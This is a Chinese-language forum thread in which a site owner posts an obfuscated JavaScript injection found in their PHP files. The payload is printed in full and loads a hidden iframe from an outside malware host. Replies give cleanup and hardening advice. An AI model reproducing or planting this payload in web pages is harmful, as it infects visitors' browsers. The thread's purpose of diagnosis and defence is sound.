代码之家 › 专栏 › 技术社区 › gillweb

在我的网络服务器php文件中发现了这个黑客

virus

1

gillweb · 技术社区 · 11 年前

我是如何得到它们的?我能做些什么来避免将来出现这种情况?

#8f4d8e#
echo "<script type=\"text/javascript\" language=\"javascript\" >ff=String;fff=\"fromCharCode\";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v=\"eval\";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0145,0163,0170,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155,0145,047,051,073,015,012,015,012,040,040,040,040,0145,0163,0170,056,0163,0162,0143,040,075,040,047,0150,0164,0164,0160,072,057,057,0141,0142,0163,0157,0154,0165,0164,0145,0147,0151,0146,0164,056,0143,0157,0155,057,0137,0160,0162,0151,0166,0141,0164,0145,057,0143,0154,0153,056,0160,0150,0160,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0160,0157,0163,0151,0164,0151,0157,0156,040,075,040,047,0141,0142,0163,0157,0154,0165,0164,0145,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0142,0157,0162,0144,0145,0162,040,075,040,047,060,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0150,0145,0151,0147,0150,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0167,0151,0144,0164,0150,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0154,0145,0146,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0164,0157,0160,040,075,040,047,061,0160,0170,047,073,015,012,015,012,040,040,040,040,0151,0146,040,050,041,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0145,0163,0170,047,051,051,040,0173,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0167,0162,0151,0164,0145,050,047,074,0144,0151,0166,040,0151,0144,075,0134,047,0145,0163,0170,0134,047,076,074,057,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0145,0163,0170,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0145,0163,0170,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+478!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(v)xz(s)}</script>";
#/8f4d8e#

3 回复 | 直到 11 年前

1

3

Tom Hold 11 年前

它似乎正在重定向到或注入来自恶意软件分发商absolutegift dot.com的内容。有人把它上传到了你的服务器上。此人(或机器人)可能设法获得了您的密码,或者他可能使用了漏洞。更改密码,确保所有用户输入(包括上传)都经过验证。确保你有一个正在运行的防火墙(我推荐使用csf),并扫描你的服务器以查找rootkit。

2

0

Nathan Goings 11 年前

请联系您的托管提供商,并将此问题通知他们。 这非常重要 我关闭了很多合法的网站,因为它们被泄露了,所有者丢失了所有的数据。

如果您正在使用Drupal、Wordpress等CMS,请确保升级并更改管理员密码。如果你有任何插件,请确保它们已经升级。
如果您没有CMS,请更改您的FTP&控制面板密码。

至于解决问题。如果您正在使用CMS,则应进行就地升级以替换所有文件。如果没有,您可以下载所有文件,并使用Notepad++之类的文字处理器在整个目录中进行查找和替换。而且 ,您的主机提供商可能能够从备份中恢复,或者至少有一些修复经验。

为了防止它,不要使用CMS并学习一些网络安全。可能会租一个顶层公寓。

3

0

mjs2020 11 年前

在一个运行Drupal 5的旧网站上,我也遇到了这种情况。我所做的是下载该网站,并使用meld(一种用于linux的图形差异工具)将其与代码库的干净副本进行比较。我发现有一个名为god.php的文件放在其中一个子目录中,其中包含一个php脚本,该脚本调用 R57 .这东西真的很可怕 can do . 我的许多文件都感染了以下内容:

<?php
#8f4d8e#
...
#/8f4d8e#
?>

我手动清理了几次,但一直被黑客入侵,直到我删除了“god.php”文件。我想你的系统可能会对它进行不同的调用。如果您可以通过SSH访问服务器,请转到文档根目录并搜索包含以下字符串的所有文件:

grep -R "#8f4d8e#" .

您也可以查找您的god.php文件版本。。。查找R57的痕迹,例如通过发布:

grep -R "R57" .

我的电脑在文件的开头画了一个很大的ASCII艺术图,画的是一个bug。

我不确定我是怎么得到的,但有一系列糟糕的事情:Drupal的未更新的旧版本,带register_globals的PHP4,共享主机(可能是一家糟糕的公司)。

我所做的是将清理过的网站转移到另一家使用PHP5的托管公司,并更改了所有密码:drupal、ftp、mysql等。